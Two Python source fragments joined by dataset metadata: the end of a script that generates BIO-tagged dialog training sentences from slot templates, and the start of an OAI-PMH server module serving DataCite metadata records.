label_list.insert(index_venue_name, inform_venue_name_tag[0])
for i in range(len(list(filter(None, venue_name.split(' '))))-1):
label_list.insert(index_venue_name+1, inform_venue_name_tag[1])
token_list = template.format(venue_name = venue_name, time = "{time}").split(' ')
index_time = token_list.index("{time}")
label_list.insert(index_time, inform_time_tag[0])
for i in range(len(list(filter(None, time.split(' ')))) - 1):
label_list.insert(index_time + 1, inform_time_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for venue_name in sample_venue_name:
for price in sample_price:
for template in inform_venue_name_and_price_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(venue_name = venue_name, price = price)
label_list = ['O' for i in range(len(token_list) - 2)]
index_venue_name = token_list.index("{venue_name}")
label_list.insert(index_venue_name, inform_venue_name_tag[0])
for i in range(len(list(filter(None, venue_name.split(' '))))-1):
label_list.insert(index_venue_name+1, inform_venue_name_tag[1])
token_list = template.format(venue_name = venue_name, price = "{price}").split(' ')
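# Same placeholder lookup as the single-slot price case: the template holds
# '{price}', '${price}', or the literal word 'free'.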
try:
index_price = token_list.index("{price}")
except ValueError:
try:
index_price = token_list.index("${price}")
except ValueError:
index_price = token_list.index("free")
label_list.insert(index_price, inform_price_tag[0])
for i in range(len(list(filter(None, price.split(' ')))) - 1):
label_list.insert(index_price + 1, inform_price_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for venue_name in sample_venue_name:
for is_weekend in sample_is_weekend:
for template in inform_venue_name_and_is_weekend_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(venue_name = venue_name, is_weekend = is_weekend)
label_list = ['O' for i in range(len(token_list) - 2)]
index_venue_name = token_list.index("{venue_name}")
label_list.insert(index_venue_name, inform_venue_name_tag[0])
for i in range(len(list(filter(None, venue_name.split(' '))))-1):
label_list.insert(index_venue_name+1, inform_venue_name_tag[1])
token_list = template.format(venue_name = venue_name, is_weekend = "{is_weekend}").split(' ')
index_is_weekend = token_list.index("{is_weekend}")
label_list.insert(index_is_weekend, inform_is_weekend_tag[0])
for i in range(len(list(filter(None, is_weekend.split(' ')))) - 1):
                label_list.insert(index_is_weekend + 1, inform_is_weekend_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for venue_name in sample_venue_name:
    for part_of_day in sample_part_of_day:
        for template in inform_venue_name_and_part_of_day_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(venue_name=venue_name, part_of_day=part_of_day)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_venue_name = token_list.index("{venue_name}")
            label_list.insert(index_venue_name, inform_venue_name_tag[0])
            for i in range(len(list(filter(None, venue_name.split(' ')))) - 1):
                label_list.insert(index_venue_name + 1, inform_venue_name_tag[1])
            token_list = template.format(venue_name=venue_name, part_of_day="{part_of_day}").split(' ')
            index_part_of_day = token_list.index("{part_of_day}")
            label_list.insert(index_part_of_day, inform_part_of_day_tag[0])
            for i in range(len(list(filter(None, part_of_day.split(' ')))) - 1):
                label_list.insert(index_part_of_day + 1, inform_part_of_day_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for region in sample_region:
    for event_host in sample_event_host:
        for template in inform_region_and_event_host_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(region=region, event_host=event_host)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_region = token_list.index("{region}")
            label_list.insert(index_region, inform_region_tag[0])
            for i in range(len(list(filter(None, region.split(' ')))) - 1):
                label_list.insert(index_region + 1, inform_region_tag[1])
            token_list = template.format(region=region, event_host="{event_host}").split(' ')
            index_event_host = token_list.index("{event_host}")
            label_list.insert(index_event_host, inform_event_host_tag[0])
            for i in range(len(list(filter(None, event_host.split(' ')))) - 1):
                label_list.insert(index_event_host + 1, inform_event_host_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for region in sample_region:
    for date_start in sample_date_start:
        for template in inform_region_and_date_start_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(region=region, date_start=date_start)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_region = token_list.index("{region}")
            label_list.insert(index_region, inform_region_tag[0])
            for i in range(len(list(filter(None, region.split(' ')))) - 1):
                label_list.insert(index_region + 1, inform_region_tag[1])
            token_list = template.format(region=region, date_start="{date_start}").split(' ')
            index_date_start = token_list.index("{date_start}")
            label_list.insert(index_date_start, inform_date_start_tag[0])
            for i in range(len(list(filter(None, date_start.split(' ')))) - 1):
                label_list.insert(index_date_start + 1, inform_date_start_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for region in sample_region:
    for time in sample_time:
        for template in inform_region_and_time_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(region=region, time=time)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_region = token_list.index("{region}")
            label_list.insert(index_region, inform_region_tag[0])
            for i in range(len(list(filter(None, region.split(' ')))) - 1):
                label_list.insert(index_region + 1, inform_region_tag[1])
            token_list = template.format(region=region, time="{time}").split(' ')
            index_time = token_list.index("{time}")
            label_list.insert(index_time, inform_time_tag[0])
            for i in range(len(list(filter(None, time.split(' ')))) - 1):
                label_list.insert(index_time + 1, inform_time_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for region in sample_region:
    for price in sample_price:
        for template in inform_region_and_price_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(region=region, price=price)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_region = token_list.index("{region}")
            label_list.insert(index_region, inform_region_tag[0])
            for i in range(len(list(filter(None, region.split(' ')))) - 1):
                label_list.insert(index_region + 1, inform_region_tag[1])
            token_list = template.format(region=region, price="{price}").split(' ')
            try:
                index_price = token_list.index("{price}")
            except ValueError:
                try:
                    index_price = token_list.index("${price}")
                except ValueError:
                    index_price = token_list.index("free")
            label_list.insert(index_price, inform_price_tag[0])
            for i in range(len(list(filter(None, price.split(' ')))) - 1):
                label_list.insert(index_price + 1, inform_price_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for region in sample_region:
    for is_weekend in sample_is_weekend:
        for template in inform_region_and_is_weekend_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(region=region, is_weekend=is_weekend)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_region = token_list.index("{region}")
            label_list.insert(index_region, inform_region_tag[0])
            for i in range(len(list(filter(None, region.split(' ')))) - 1):
                label_list.insert(index_region + 1, inform_region_tag[1])
            token_list = template.format(region=region, is_weekend="{is_weekend}").split(' ')
            index_is_weekend = token_list.index("{is_weekend}")
            label_list.insert(index_is_weekend, inform_is_weekend_tag[0])
            for i in range(len(list(filter(None, is_weekend.split(' ')))) - 1):
                label_list.insert(index_is_weekend + 1, inform_is_weekend_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for region in sample_region:
    for part_of_day in sample_part_of_day:
        for template in inform_region_and_part_of_day_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(region=region, part_of_day=part_of_day)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_region = token_list.index("{region}")
            label_list.insert(index_region, inform_region_tag[0])
            for i in range(len(list(filter(None, region.split(' ')))) - 1):
                label_list.insert(index_region + 1, inform_region_tag[1])
            token_list = template.format(region=region, part_of_day="{part_of_day}").split(' ')
            index_part_of_day = token_list.index("{part_of_day}")
            label_list.insert(index_part_of_day, inform_part_of_day_tag[0])
            for i in range(len(list(filter(None, part_of_day.split(' ')))) - 1):
                label_list.insert(index_part_of_day + 1, inform_part_of_day_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for event_host in sample_event_host:
    for date_start in sample_date_start:
        for template in inform_event_host_and_date_start_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(event_host=event_host, date_start=date_start)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_event_host = token_list.index("{event_host}")
            label_list.insert(index_event_host, inform_event_host_tag[0])
            for i in range(len(list(filter(None, event_host.split(' ')))) - 1):
                label_list.insert(index_event_host + 1, inform_event_host_tag[1])
            token_list = template.format(event_host=event_host, date_start="{date_start}").split(' ')
            index_date_start = token_list.index("{date_start}")
            label_list.insert(index_date_start, inform_date_start_tag[0])
            for i in range(len(list(filter(None, date_start.split(' ')))) - 1):
                label_list.insert(index_date_start + 1, inform_date_start_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for event_host in sample_event_host:
    for time in sample_time:
        for template in inform_event_host_and_time_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(event_host=event_host, time=time)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_event_host = token_list.index("{event_host}")
            label_list.insert(index_event_host, inform_event_host_tag[0])
            for i in range(len(list(filter(None, event_host.split(' ')))) - 1):
                label_list.insert(index_event_host + 1, inform_event_host_tag[1])
            token_list = template.format(event_host=event_host, time="{time}").split(' ')
            index_time = token_list.index("{time}")
            label_list.insert(index_time, inform_time_tag[0])
            for i in range(len(list(filter(None, time.split(' ')))) - 1):
                label_list.insert(index_time + 1, inform_time_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for event_host in sample_event_host:
    for price in sample_price:
        for template in inform_event_host_and_price_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(event_host=event_host, price=price)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_event_host = token_list.index("{event_host}")
            label_list.insert(index_event_host, inform_event_host_tag[0])
            for i in range(len(list(filter(None, event_host.split(' ')))) - 1):
                label_list.insert(index_event_host + 1, inform_event_host_tag[1])
            token_list = template.format(event_host=event_host, price="{price}").split(' ')
            try:
                index_price = token_list.index("{price}")
            except ValueError:
                try:
                    index_price = token_list.index("${price}")
                except ValueError:
                    index_price = token_list.index("free")
            label_list.insert(index_price, inform_price_tag[0])
            for i in range(len(list(filter(None, price.split(' ')))) - 1):
                label_list.insert(index_price + 1, inform_price_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for event_host in sample_event_host:
    for is_weekend in sample_is_weekend:
        for template in inform_event_host_and_is_weekend_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(event_host=event_host, is_weekend=is_weekend)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_event_host = token_list.index("{event_host}")
            label_list.insert(index_event_host, inform_event_host_tag[0])
            for i in range(len(list(filter(None, event_host.split(' ')))) - 1):
                label_list.insert(index_event_host + 1, inform_event_host_tag[1])
            token_list = template.format(event_host=event_host, is_weekend="{is_weekend}").split(' ')
            index_is_weekend = token_list.index("{is_weekend}")
            label_list.insert(index_is_weekend, inform_is_weekend_tag[0])
            for i in range(len(list(filter(None, is_weekend.split(' ')))) - 1):
                label_list.insert(index_is_weekend + 1, inform_is_weekend_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for event_host in sample_event_host:
    for part_of_day in sample_part_of_day:
        for template in inform_event_host_and_part_of_day_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(event_host=event_host, part_of_day=part_of_day)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_event_host = token_list.index("{event_host}")
            label_list.insert(index_event_host, inform_event_host_tag[0])
            for i in range(len(list(filter(None, event_host.split(' ')))) - 1):
                label_list.insert(index_event_host + 1, inform_event_host_tag[1])
            token_list = template.format(event_host=event_host, part_of_day="{part_of_day}").split(' ')
            index_part_of_day = token_list.index("{part_of_day}")
            label_list.insert(index_part_of_day, inform_part_of_day_tag[0])
            for i in range(len(list(filter(None, part_of_day.split(' ')))) - 1):
                label_list.insert(index_part_of_day + 1, inform_part_of_day_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for date_start in sample_date_start:
    for time in sample_time:
        for template in inform_date_start_and_time_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(date_start=date_start, time=time)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_date_start = token_list.index("{date_start}")
            label_list.insert(index_date_start, inform_date_start_tag[0])
            for i in range(len(list(filter(None, date_start.split(' ')))) - 1):
                label_list.insert(index_date_start + 1, inform_date_start_tag[1])
            token_list = template.format(date_start=date_start, time="{time}").split(' ')
            index_time = token_list.index("{time}")
            label_list.insert(index_time, inform_time_tag[0])
            for i in range(len(list(filter(None, time.split(' ')))) - 1):
                label_list.insert(index_time + 1, inform_time_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for date_start in sample_date_start:
    for price in sample_price:
        for template in inform_date_start_and_price_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(date_start=date_start, price=price)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_date_start = token_list.index("{date_start}")
            label_list.insert(index_date_start, inform_date_start_tag[0])
            for i in range(len(list(filter(None, date_start.split(' ')))) - 1):
                label_list.insert(index_date_start + 1, inform_date_start_tag[1])
            token_list = template.format(date_start=date_start, price="{price}").split(' ')
            try:
                index_price = token_list.index("{price}")
            except ValueError:
                try:
                    index_price = token_list.index("${price}")
                except ValueError:
                    index_price = token_list.index("free")
            label_list.insert(index_price, inform_price_tag[0])
            for i in range(len(list(filter(None, price.split(' ')))) - 1):
                label_list.insert(index_price + 1, inform_price_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for date_start in sample_date_start:
    for part_of_day in sample_part_of_day:
        for template in inform_date_start_and_part_of_day_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(date_start=date_start, part_of_day=part_of_day)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_date_start = token_list.index("{date_start}")
            label_list.insert(index_date_start, inform_date_start_tag[0])
            for i in range(len(list(filter(None, date_start.split(' ')))) - 1):
                label_list.insert(index_date_start + 1, inform_date_start_tag[1])
            token_list = template.format(date_start=date_start, part_of_day="{part_of_day}").split(' ')
            index_part_of_day = token_list.index("{part_of_day}")
            label_list.insert(index_part_of_day, inform_part_of_day_tag[0])
            for i in range(len(list(filter(None, part_of_day.split(' ')))) - 1):
                label_list.insert(index_part_of_day + 1, inform_part_of_day_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for time in sample_time:
    for price in sample_price:
        for template in inform_time_and_price_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(time=time, price=price)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_time = token_list.index("{time}")
            label_list.insert(index_time, inform_time_tag[0])
            for i in range(len(list(filter(None, time.split(' ')))) - 1):
                label_list.insert(index_time + 1, inform_time_tag[1])
            token_list = template.format(time=time, price="{price}").split(' ')
            try:
                index_price = token_list.index("{price}")
            except ValueError:
                try:
                    index_price = token_list.index("${price}")
                except ValueError:
                    index_price = token_list.index("free")
            label_list.insert(index_price, inform_price_tag[0])
            for i in range(len(list(filter(None, price.split(' ')))) - 1):
                label_list.insert(index_price + 1, inform_price_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for time in sample_time:
    for is_weekend in sample_is_weekend:
        for template in inform_time_and_is_weekend_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(time=time, is_weekend=is_weekend)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_time = token_list.index("{time}")
            label_list.insert(index_time, inform_time_tag[0])
            for i in range(len(list(filter(None, time.split(' ')))) - 1):
                label_list.insert(index_time + 1, inform_time_tag[1])
            token_list = template.format(time=time, is_weekend="{is_weekend}").split(' ')
            index_is_weekend = token_list.index("{is_weekend}")
            label_list.insert(index_is_weekend, inform_is_weekend_tag[0])
            for i in range(len(list(filter(None, is_weekend.split(' ')))) - 1):
                label_list.insert(index_is_weekend + 1, inform_is_weekend_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for price in sample_price:
    for is_weekend in sample_is_weekend:
        for template in inform_price_and_is_weekend_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(price=price, is_weekend=is_weekend)
            label_list = ['O' for i in range(len(token_list) - 2)]
            try:
                index_price = token_list.index("{price}")
            except ValueError:
                try:
                    index_price = token_list.index("${price}")
                except ValueError:
                    index_price = token_list.index("free")
            label_list.insert(index_price, inform_price_tag[0])
            for i in range(len(list(filter(None, price.split(' ')))) - 1):
                label_list.insert(index_price + 1, inform_price_tag[1])
            token_list = template.format(price=price, is_weekend="{is_weekend}").split(' ')
            index_is_weekend = token_list.index("{is_weekend}")
            label_list.insert(index_is_weekend, inform_is_weekend_tag[0])
            for i in range(len(list(filter(None, is_weekend.split(' ')))) - 1):
                label_list.insert(index_is_weekend + 1, inform_is_weekend_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for price in sample_price:
    for part_of_day in sample_part_of_day:
        for template in inform_price_and_part_of_day_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(price=price, part_of_day=part_of_day)
            label_list = ['O' for i in range(len(token_list) - 2)]
            try:
                index_price = token_list.index("{price}")
            except ValueError:
                try:
                    index_price = token_list.index("${price}")
                except ValueError:
                    index_price = token_list.index("free")
            label_list.insert(index_price, inform_price_tag[0])
            for i in range(len(list(filter(None, price.split(' ')))) - 1):
                label_list.insert(index_price + 1, inform_price_tag[1])
            token_list = template.format(price=price, part_of_day="{part_of_day}").split(' ')
            index_part_of_day = token_list.index("{part_of_day}")
            label_list.insert(index_part_of_day, inform_part_of_day_tag[0])
            for i in range(len(list(filter(None, part_of_day.split(' ')))) - 1):
                label_list.insert(index_part_of_day + 1, inform_part_of_day_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')

for is_weekend in sample_is_weekend:
    for part_of_day in sample_part_of_day:
        for template in inform_is_weekend_and_part_of_day_template:
            template = template.replace('.', '').replace('?', '').replace(',', '')
            token_list = list(filter(None, template.split(' ')))
            sentence = template.format(is_weekend=is_weekend, part_of_day=part_of_day)
            label_list = ['O' for i in range(len(token_list) - 2)]
            index_is_weekend = token_list.index("{is_weekend}")
            label_list.insert(index_is_weekend, inform_is_weekend_tag[0])
            for i in range(len(list(filter(None, is_weekend.split(' ')))) - 1):
                label_list.insert(index_is_weekend + 1, inform_is_weekend_tag[1])
            token_list = template.format(is_weekend=is_weekend, part_of_day="{part_of_day}").split(' ')
            index_part_of_day = token_list.index("{part_of_day}")
            label_list.insert(index_part_of_day, inform_part_of_day_tag[0])
            for i in range(len(list(filter(None, part_of_day.split(' ')))) - 1):
                label_list.insert(index_part_of_day + 1, inform_part_of_day_tag[1])
            if len(label_list) != len(sentence.split()):
                print(sentence)
                print(' '.join(label_list))
            else:
                count += 1
                file_1.write(sentence + '\n')
                file_1.write(' '.join(label_list) + '\n')
                file_2.write(sentence + '\n')
                file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
file_1.close()
file_2.close()
print(count) | 64.247681 | 136 | 0.657837 | 28,487 | 187,025 | 4.178151 | 0.026679 | 0.029574 | 0.057947 | 0.036564 | 0.950287 | 0.942272 | 0.925544 | 0.904926 | 0.864875 | 0.812725 | 0 | 0.00408 | 0.224173 | 187,025 | 2,911 | 137 | 64.247681 | 0.816208 | 0.000155 | 0 | 0.285185 | 0 | 0.023704 | 0.642806 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.000741 | 0 | 0.000741 | 0.025556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
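The record above repeats one labelling routine for every pair of slots. As a minimal sketch of how that repetition could be collapsed, the helper below parameterises the two-slot case; build_bio_example and its argument names are hypothetical (not part of the original script), and it deliberately skips the "${price}"/"free" special case that the try/except blocks above handle.

# Hypothetical refactor of the repeated two-slot labelling blocks above.
def build_bio_example(template, slots, tags):
    """Fill a two-slot template and build word-aligned BIO labels.

    template: e.g. "there is an event at {venue_name} in the {part_of_day}"
    slots:    mapping of slot name -> slot value string
    tags:     mapping of slot name -> (begin_tag, inside_tag) pair
    """
    template = template.replace('.', '').replace('?', '').replace(',', '')
    sentence = template.format(**slots)
    labels = []
    for token in template.split():
        slot = next((s for s in slots if token == '{%s}' % s), None)
        if slot is None:
            labels.append('O')
        else:
            begin, inside = tags[slot]
            n_words = len(slots[slot].split())
            labels.extend([begin] + [inside] * (n_words - 1))
    return sentence, labels

sentence, labels = build_bio_example(
    "there is an event at {venue_name} in the {part_of_day}",
    {"venue_name": "city hall", "part_of_day": "evening"},
    {"venue_name": ("B-VENUE", "I-VENUE"), "part_of_day": ("B-POD", "I-POD")},
)
assert len(labels) == len(sentence.split())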
78729aa28bd96eb3200564a973068753d6a7d48c | 20,061 | py | Python | viringo/catalogs.py | axfelix/viringo | 44b3035a374c7c53b8077f6061402d9fdf595450 | [
"MIT"
] | null | null | null | viringo/catalogs.py | axfelix/viringo | 44b3035a374c7c53b8077f6061402d9fdf595450 | [
"MIT"
] | null | null | null | viringo/catalogs.py | axfelix/viringo | 44b3035a374c7c53b8077f6061402d9fdf595450 | [
"MIT"
] | 1 | 2020-06-19T16:35:52.000Z | 2020-06-19T16:35:52.000Z | """
OAI-PMH compatible catalogs for parsing data and building appropriate responses.
They conform to the oaipmh.common.ResumptionOAIPMH interface provided by the
pyoai library.
"""
import base64
import binascii
import logging
from datetime import datetime
from oaipmh import common, error
from viringo import config
from .services import datacite
from .services import frdr


class DataCiteOAIServer():
    """Build OAI-PMH data responses for DataCite metadata catalog"""

    def identify(self):
        """Construct common identification for the OAI service"""
        identify = common.Identify(
            repositoryName=config.OAIPMH_REPOS_NAME,
            baseURL=config.OAIPMH_BASE_URL,
            protocolVersion="2.0",
            adminEmails=[config.OAIPMH_ADMIN_EMAIL],
            earliestDatestamp=datetime(2011, 1, 1),
            deletedRecord='persistent',
            granularity='YYYY-MM-DDThh:mm:ssZ',
            compression=['gzip', 'deflate'],
            toolkit_description=False)

        # Specify a custom description
        datacite_desc = """
        <oai-identifier xmlns="http://www.openarchives.org/OAI/2.0/oai-identifier" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai-identifier http://www.openarchives.org/OAI/2.0/oai-identifier.xsd">
            <scheme>oai</scheme>
            <repositoryIdentifier>oai.datacite.org</repositoryIdentifier>
            <delimiter>:</delimiter>
            <sampleIdentifier>oai:oai.datacite.org:12425</sampleIdentifier>
        </oai-identifier>
        """
        identify.add_description(xml_string=datacite_desc)

        return identify

    def listMetadataFormats(self, identifier=None):
        #pylint: disable=no-self-use,invalid-name
        """Returns metadata formats available for the repository

        Identifier does nothing as our repository responds in all formats for all dois
        """
        # PyOAI expects result format (metadataPrefix, schema, metadataNamespace)
        format_oai_dc = (
            'oai_dc',
            'http://www.openarchives.org/OAI/2.0/oai_dc.xsd',
            'http://www.openarchives.org/OAI/2.0/oai_dc/'
        )
        format_oai_datacite = (
            'oai_datacite',
            'http://schema.datacite.org/oai/oai-1.1/oai.xsd',
            'http://schema.datacite.org/oai/oai-1.1/'
        )
        format_datacite = (
            'datacite',
            'http://schema.datacite.org/meta/nonexistant/nonexistant.xsd',
            'http://datacite.org/schema/nonexistant'
        )

        return [format_oai_dc, format_oai_datacite, format_datacite]

    def getRecord(self, metadataPrefix, identifier):
        #pylint: disable=no-self-use,invalid-name
        """Returns pyoai data tuple for specific record"""
        # We just want the DOI out of the OAI identifier.
        _, doi = identifier.split(':', 1)

        result = datacite.get_metadata(doi)
        if not result:
            raise error.IdDoesNotExistError(
                "\"%s\" is unknown or illegal in this repository" % identifier
            )

        # Build metadata based on requested format and result
        metadata = self.build_metadata_map(result)

        header = self.build_header(result)
        record = self.build_record(metadata)

        data = (
            header,
            record,
            None  # About string - not used
        )
